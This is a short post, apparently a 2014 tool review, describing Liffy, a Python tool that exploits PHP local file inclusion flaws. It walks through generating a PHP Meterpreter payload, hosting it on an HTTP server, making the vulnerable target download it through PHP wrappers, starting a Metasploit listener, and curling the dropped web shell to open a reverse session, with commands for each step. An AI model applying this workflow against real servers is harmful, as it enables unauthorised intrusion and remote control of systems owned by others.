Liffy - Local File Inclusion Exploitation Tool
Liffy is a tool written in Python designed to exploit local file  inclusion vulnerabilities using three different techniques that will get  you a working web shell.  The first two make use of the built-in PHP  wrappers php://input and data://.  The third makes use of the process control extension called 'expect'.
For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.
 Exploitation
Once you have found an local file inclusion vulnerability, you simply  point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --dataThe tool will create a PHP Meterpreter payload using msfpayload and  drop it into your /tmp directory.  It will then attempt to use the PHP  wrapper to download the generated shell which you should have hosted by  either using Node or Python's HTTP web servers.
http-server /tmp -p 8000If all this works you should see a GET request to your shell, which  is then downloaded to the working directory on the target webserver.   From there a Metasploit resource file is created for you to spawn up a  listening handler for inbound connections from the reverse PHP  Meterpreter.
msfconsole -r php_listener.rcNow you simply curl the location of your webshell and you should get see a new Meterpreter session spawn
curl --silent http://target/vuln/7ka0tqsq.php
Liffy - Local File Inclusion Exploitation Tool
 
              Reviewed by 0x000216
              on 
              
Monday, June 02, 2014
 
              Rating: 5
 
              Reviewed by 0x000216
              on 
              
Monday, June 02, 2014
 
              Rating: 5





.jpg)
.jpg)
